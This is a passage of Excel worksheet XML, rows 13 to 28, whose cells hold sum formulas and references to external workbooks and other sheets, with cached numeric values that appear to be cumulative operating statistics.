      <c r="S13" s="209">
        <f>'[11]10'!$X$68</f>
        <v>262.181818181818</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]10'!$Y$68</f>
        <v>266.272351104418</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]10'!$T$68</f>
        <v>100</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]10'!$U$68</f>
        <v>64.1666666666667</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]10'!$V$68</f>
        <v>71.3363614341085</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]10'!$Q$68</f>
        <v>24.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]10'!$R$68</f>
        <v>154.00</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]10'!$S$68</f>
        <v>5889.53</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>4288</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'9'!H14</f>
        <v>24991</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>989534.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>3874.7</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'9'!K14</f>
        <v>53558.795</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1846502.901</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>65896.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]10'!$W$71</f>
        <v>205.916666666667</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]10'!$X$71</f>
        <v>221.836327345309</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]10'!$Y$71</f>
        <v>213.751972059975</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]10'!$T$71</f>
        <v>100</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]10'!$U$71</f>
        <v>52.1875</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]10'!$V$71</f>
        <v>50.2876695736434</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]10'!$Q$71</f>
        <v>24.00</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]10'!$R$71</f>
        <v>125.25</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]10'!$S$71</f>
        <v>4151.75</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'9'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>157.88</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'9'!K15</f>
        <v>2121.676</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>116878.176</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]10'!$W$72</f>
        <v>70.4680290046144</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]10'!$X$72</f>
        <v>65.6309788015612</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]10'!$Y$72</f>
        <v>61.4195186191557</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]10'!$T$72</f>
        <v>63.2083333333333</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]10'!$U$72</f>
        <v>54.4458333333333</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]10'!$V$72</f>
        <v>50.8620397286822</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]10'!$Q$72</f>
        <v>15.17</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]10'!$R$72</f>
        <v>130.67</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]10'!$S$72</f>
        <v>4199.17</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'9'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'9'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]10'!$W$73</f>
        <v>63.6123928806856</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]10'!$X$73</f>
        <v>64.4294788398255</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]10'!$Y$73</f>
        <v>62.962515715712</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]10'!$T$73</f>
        <v>63.2083333333333</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]10'!$U$73</f>
        <v>54.4458333333333</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]10'!$V$73</f>
        <v>52.4089147286822</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]10'!$Q$73</f>
        <v>15.17</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]10'!$R$73</f>
        <v>130.67</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]10'!$S$73</f>
        <v>4326.88</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'9'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'9'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]10'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]10'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]10'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]10'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]10'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]10'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]10'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]10'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]10'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'9'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'9'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]10'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]10'!$X$74</f>
        <v>215.6</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]10'!$Y$74</f>
        <v>222.285944084066</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]10'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]10'!$U$74</f>
        <v>4.16666666666667</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]10'!$V$74</f>
        <v>6.92744670542636</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]10'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]10'!$R$74</f>
        <v>10</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]10'!$S$74</f>
        <v>571.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'9'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'9'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]10'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]10'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]10'!$Y$72</f>
        <v>9.11680911680912e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]10'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]10'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]10'!$V$72</f>
        <v>4.25145348837209e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]10'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]10'!$R$72</f>
        <v>1e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]10'!$S$72</f>
        <v>0.000351</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'9'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'9'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]10'!$W$73</f>
        <v>1e-5</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]10'!$X$73</f>
        <v>1e-5</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]10'!$Y$73</f>
        <v>239.299857656057</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]10'!$T$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]10'!$U$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]10'!$V$73</f>
        <v>70.0306486312984</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]10'!$Q$73</f>
        <v>1e-6</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]10'!$R$73</f>
        <v>1e-5</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]10'!$S$73</f>
        <v>5781.730351</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]10'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]10'!$E$22</f>
        <v>5665</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'9'!H21</f>
        <v>69515</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2178953</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]10'!$I$22</f>
        <v>7007.66</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'9'!K21</f>
        <v>78460.64</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2144914.64</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]10'!$L$22</f>
        <v>74107.67</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>157.675893617021</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209" t="e">
        <f>'[13]10'!$W$81</f>
        <v>#DIV/0!</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]10'!$X$81</f>
        <v>284.230246010066</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]10'!$Y$81</f>
        <v>275.983865322295</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]10'!$T$81</f>
        <v>0</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]10'!$U$81</f>
        <v>44.3607638888889</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]10'!$V$81</f>
        <v>36.3642098675711</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]10'!$Q$81</f>
        <v>0</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]10'!$R$81</f>
        <v>106.465833333333</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]10'!$S$81</f>
        <v>3002.22916666667</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]10'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]10'!$E$17</f>
        <v>4020</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'9'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]10'!$I$17</f>
        <v>5727.7</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'9'!K22</f>
        <v>66755.04</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>1958216.42</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]10'!$L$17</f>
        <v>185871.312</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>92.935656</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]10'!$W$79</f>
        <v>113.264051052603</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]10'!$X$79</f>
        <v>99.7098557155798</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]10'!$Y$79</f>
        <v>102.174063508091</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]10'!$T$79</f>
        <v>64.9293981481482</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]10'!$U$79</f>
        <v>52.8951388888889</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]10'!$V$79</f>
        <v>45.5972289513351</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]10'!$Q$79</f>
        <v>15.5830555555556</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]10'!$R$79</f>
        <v>126.948333333333</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]10'!$S$79</f>
        <v>3764.50722222222</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]10'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]10'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'9'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]10'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'9'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]10'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209" t="e">
        <f>'[13]10'!$W$80</f>
        <v>#DIV/0!</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]10'!$X$80</f>
        <v>83.2063967810806</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]10'!$Y$80</f>
        <v>79.2903415183323</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]10'!$T$80</f>
        <v>0</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]10'!$U$80</f>
        <v>45.1037037037037</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]10'!$V$80</f>
        <v>32.8622180501723</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]10'!$Q$80</f>
        <v>0</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]10'!$R$80</f>
        <v>108.248888888889</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]10'!$S$80</f>
        <v>2713.10472222222</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]10'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]10'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'9'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]10'!$I$56</f>
        <v>1476.7</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'9'!K24</f>
        <v>16477.26</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>296303.79</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]10'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]10'!$R$6</f>
        <v>78.6666666666667</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]10'!$S$6</f>
        <v>84.354609929078</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]10'!$T$6</f>
        <v>86.1021656685706</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]10'!$O$6</f>
        <v>40.625</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]10'!$P$6</f>
        <v>58.75</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]10'!$Q$6</f>
        <v>52.5062984496124</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]10'!$L$6</f>
        <v>9.75</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]10'!$M$6</f>
        <v>141</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]10'!$N$6</f>
        <v>4334.92</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]10'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'9'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]10'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'9'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]10'!$R$7</f>
        <v>200</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]10'!$S$7</f>
        <v>203.338983050847</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]10'!$T$7</f>
        <v>188.020760376566</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]10'!$O$7</f>
        <v>48.9583333333333</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]10'!$P$7</f>
        <v>49.1666666666667</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]10'!$Q$7</f>
        <v>50.1523740310078</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]10'!$L$7</f>
        <v>11.75</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]10'!$M$7</f>
        <v>118</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]10'!$N$7</f>
        <v>4140.58</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'9'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'9'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]10'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]10'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]10'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]10'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]10'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]10'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]10'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]10'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]10'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'9'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'9'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]10'!$W$69</f>
        <v>22.7100411397227</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]10'!$X$69</f>
        <v>23.0687750346886</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]10'!$Y$69</f>
        <v>25.3169790887452</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]10'!$T$69</f>
        <v>100</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]10'!$U$69</f>
        <v>60.1333333333333</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]10'!$V$69</f>
        <v>68.1346899224806</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]10'!$Q$69</f>
        <v>24.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]10'!$R$69</f>
        <v>144.32</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]10'!$S$69</f>
        <v>5625.20</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'9'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
